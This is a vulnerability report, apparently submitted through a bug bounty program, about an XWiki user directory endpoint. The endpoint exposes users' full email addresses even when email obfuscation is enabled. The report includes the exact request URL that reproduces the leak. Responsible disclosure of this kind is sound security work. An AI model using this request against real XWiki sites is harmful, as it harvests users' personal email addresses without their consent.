*SUBMISSION REFERENCES* * { * } Submission code { * } : XWIKI-7B910O3J * { * } Submission URL { * } : [ https://www.intigriti.com/auth/dashboard?redirect=/submissions/e95a7ad5-7029-4627-abf0-3e3e3ea0b4ce/XWIKI-7B910O3J ]
*RESEARCHER INFORMATION* * { * } Submitter { * } : floerer
*SUBMISSION INFORMATION* * { * } Created at { * } : Thu, 03 Nov 2022 07:48:27 GMT * { * } Submission status { * } : Accepted Archived
*REPORT CONTENT* * { * } Severity { * } : High (7.5) * { * } Domain { * } : [ https://intigriti.xwiki.com/ ] (Url) * { * } Proof of concept { * } : According to the out-of-scope section all the user data is public except for the email and password, however it is possible to retrieve the email address of other users.
* { * }Prerequisite{*}*
- Activate email obfuscation.
*{*} Steps to reproduce { * } * 1. Go to [ https://intigriti.xwiki.com/xwiki/bin/get/XWiki/UserDirectoryLivetableResults?outputSyntax=plain&transprefix=xe.userdirectory.&classname=XWiki.XWikiUsers&collist=_avatar%2Cdoc.name%2Cfirst_name%2Clast_name%2Cemail%2Cactive&queryFilters=currentlanguage%2Chidden&&hideDisabledProfiles=true&offset=1&limit=10&reqNo=1&sort=doc.name&dir=asc ] 2. Now you will see the list of users, you can search for `floerer@intigriti.me` and see that my email address is there, only the short version `f....@intigriti.me` is shown in the frontend but via the endpoint the full address can be retrieved * { * } Impact { * } : Retrieve full email addresses of all the users on the platform. * { * } Personal data involved { * } : No * { * } Endpoint { * } : [ https://intigriti.xwiki.com/xwiki/bin/get/XWiki/UserDirectoryLivetableResults?outputSyntax=plain&transprefix=xe.userdirectory.&classname=XWiki.XWikiUsers&collist=_avatar%2Cdoc.name%2Cfirst_name%2Clast_name%2Cemail%2Cactive&queryFilters=currentlanguage%2Chidden&&hideDisabledProfiles=true&offset=1&limit=10&reqNo=1&sort=doc.name&dir=asc ] * { * } Type { * } : Improper Access Control * { * } Attachments { * } : No attachments available
|
|